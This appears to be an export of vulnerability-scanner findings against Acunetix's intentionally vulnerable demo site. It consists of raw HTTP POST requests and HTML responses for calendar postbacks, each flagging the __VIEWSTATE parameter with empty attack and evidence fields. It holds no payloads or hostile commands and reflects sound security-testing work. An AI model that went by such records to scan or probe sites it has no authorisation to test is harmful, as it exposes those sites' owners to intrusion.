Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8411&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCAW8hm89oIZGRklO6UDtedbF%2FlJRfygIRRvR2clOw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK5zMSZAwL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gX9mbBj2GSovbqhaAisX3pDdFF5TA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:27:44 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCAW8hm89oIZGRklO6UDtedbF/lJRfygIRRvR2clOw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK5zMSZAwL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gX9mbBj2GSovbqhaAisX3pDdFF5TA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:White" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1103 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,103 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8399&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCAZsv46doIZGRkR3UqNqE9WTvTfMWzP%2FfxhR5BnRY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKK6qG%2FBQL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gX75G%2BuK5HF%2B23h9HcWBJasZSbvNA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:54:03 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCAZsv46doIZGRkR3UqNqE9WTvTfMWzP/fxhR5BnRY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKK6qG/BQL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gX75G+uK5HF+23h9HcWBJasZSbvNA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:White" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1101 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
